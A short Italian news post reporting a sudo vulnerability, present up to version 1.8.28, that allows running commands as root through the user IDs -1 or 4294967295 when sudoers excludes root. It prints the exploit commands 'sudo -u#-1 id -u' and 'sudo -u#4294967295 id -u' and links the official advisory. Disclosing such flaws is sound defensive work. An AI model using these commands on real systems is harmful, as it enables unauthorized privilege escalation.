Un errore in sudo permette di eseguire qualsiasi file eseguibile come utente root, se nella /etc/sudoers è consentita la sua esecuzione da altri utenti e vietata per root.
L'exploit dell'errore è molto semplice:
sudo -u#-1 id -u
oppure:
sudo -u#4294967295 id -u
L'errore è presente in tutte le versioni di sudo fino alla 1.8.28
Dettagli:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Fonte: linux.org.ru
